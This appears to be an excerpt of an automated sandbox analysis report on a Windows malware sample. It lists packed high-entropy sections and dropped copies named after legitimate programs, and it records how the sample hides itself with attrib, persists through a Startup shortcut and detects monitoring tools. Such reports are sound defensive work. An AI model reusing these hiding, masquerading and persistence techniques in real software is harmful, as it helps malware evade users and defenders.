                    Source: windows photo viewer.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: autoit3.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: microsoft.net.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: common files.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows sidebar.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: java.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: msecache.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows multimedia platform.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: jdownloader.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows media player.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: windows mail.exe.0.drStatic PE information: real checksum: 0x1bc7f7 should be: 0x1ba398
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: DQmU06kq9I.exeStatic PE information: section name: .idata
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: DQmU06kq9I.exeStatic PE information: section name: fsrfimey
                    Source: DQmU06kq9I.exeStatic PE information: section name: mhpawist
                    Source: DQmU06kq9I.exeStatic PE information: section name: .taggant
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: .idata
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: .taggant
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name: .idata
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows nt.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows nt.exe.0.drStatic PE information: section name: .taggant
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: .idata
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: .taggant
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name: .idata
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows portable devices.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows portable devices.exe.0.drStatic PE information: section name: .taggant
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name: .idata
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows sidebar.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows sidebar.exe.0.drStatic PE information: section name: .taggant
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name: .idata
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name: fsrfimey
                    Source: autoit3.exe.0.drStatic PE information: section name: mhpawist
                    Source: autoit3.exe.0.drStatic PE information: section name: .taggant
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name: .idata
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windowspowershell.exe.0.drStatic PE information: section name: mhpawist
                    Source: windowspowershell.exe.0.drStatic PE information: section name: .taggant
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name: .idata
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name: fsrfimey
                    Source: common files.exe.0.drStatic PE information: section name: mhpawist
                    Source: common files.exe.0.drStatic PE information: section name: .taggant
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name: .idata
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name: fsrfimey
                    Source: google.exe.0.drStatic PE information: section name: mhpawist
                    Source: google.exe.0.drStatic PE information: section name: .taggant
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name: .idata
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name: fsrfimey
                    Source: internet explorer.exe.0.drStatic PE information: section name: mhpawist
                    Source: internet explorer.exe.0.drStatic PE information: section name: .taggant
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name: .idata
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name: fsrfimey
                    Source: java.exe.0.drStatic PE information: section name: mhpawist
                    Source: java.exe.0.drStatic PE information: section name: .taggant
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name: .idata
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name: fsrfimey
                    Source: jdownloader.exe.0.drStatic PE information: section name: mhpawist
                    Source: jdownloader.exe.0.drStatic PE information: section name: .taggant
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: .idata
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: fsrfimey
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: mhpawist
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: .taggant
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name: fsrfimey
                    Source: microsoft.exe.0.drStatic PE information: section name: mhpawist
                    Source: microsoft.exe.0.drStatic PE information: section name: .taggant
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name: fsrfimey
                    Source: microsoft office.exe.0.drStatic PE information: section name: mhpawist
                    Source: microsoft office.exe.0.drStatic PE information: section name: .taggant
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name: fsrfimey
                    Source: microsoft.net.exe.0.drStatic PE information: section name: mhpawist
                    Source: microsoft.net.exe.0.drStatic PE information: section name: .taggant
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: .idata
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: fsrfimey
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: mhpawist
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: .taggant
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name: .idata
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name: fsrfimey
                    Source: msbuild.exe.0.drStatic PE information: section name: mhpawist
                    Source: msbuild.exe.0.drStatic PE information: section name: .taggant
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name: .idata
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name: fsrfimey
                    Source: msecache.exe.0.drStatic PE information: section name: mhpawist
                    Source: msecache.exe.0.drStatic PE information: section name: .taggant
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name: .idata
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name: fsrfimey
                    Source: reference assemblies.exe.0.drStatic PE information: section name: mhpawist
                    Source: reference assemblies.exe.0.drStatic PE information: section name: .taggant
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name: .idata
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows defender.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows defender.exe.0.drStatic PE information: section name: .taggant
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name: .idata
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows mail.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows mail.exe.0.drStatic PE information: section name: .taggant
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name: .idata
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name: fsrfimey
                    Source: windows media player.exe.0.drStatic PE information: section name: mhpawist
                    Source: windows media player.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C31310 push eax; ret 0_2_07C312E2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C312C8 push eax; ret 0_2_07C312D2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C312D8 push eax; ret 0_2_07C312E2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C312E8 push eax; ret 0_2_07C312F2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 0_2_07C31288 push eax; ret 0_2_07C312C2
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_07AD0FA0 push eax; ret 9_2_07AD0FAA
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_07AD0F80 push eax; ret 9_2_07AD0F8A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_07AD0F90 push eax; ret 9_2_07AD0F9A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_07AD0FC8 push eax; ret 9_2_07AD0F9A
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeCode function: 9_2_07AD0F62 push eax; ret 9_2_07AD0F7A
                    Source: DQmU06kq9I.exeStatic PE information: section name: entropy: 7.964759279856404
                    Source: DQmU06kq9I.exeStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows nt.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows nt.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows portable devices.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows portable devices.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows sidebar.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows sidebar.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: autoit3.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: autoit3.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windowspowershell.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windowspowershell.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: common files.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: common files.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: google.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: google.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: internet explorer.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: internet explorer.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: java.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: java.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: jdownloader.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: jdownloader.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: microsoft.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: microsoft.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: microsoft office.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: microsoft office.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: microsoft.net.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: microsoft.net.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: msbuild.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: msbuild.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: msecache.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: msecache.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: reference assemblies.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: reference assemblies.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows defender.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows defender.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows mail.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows mail.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624
                    Source: windows media player.exe.0.drStatic PE information: section name: entropy: 7.964759279856404
                    Source: windows media player.exe.0.drStatic PE information: section name: fsrfimey entropy: 7.953315584919624

                    Persistence and Installation Behavior

                    barindex
                    Uses attrib.exe to hide files
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                    Uses cmd line tools excessively to alter registry or file data
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\msecache.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows media player.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\jdownloader.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\internet explorer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\common files.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\google.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows portable devices.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\mozilla maintenance service.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\microsoft.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows mail.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\microsoft.net.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windowspowershell.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\microsoft office.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows photo viewer.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\autoit3.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows nt.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows multimedia platform.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows sidebar.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\reference assemblies.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\msbuild.exeJump to dropped file
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\OneDrive\windows defender.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow searched: window name: RegmonclassJump to behavior
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnkJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnkJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
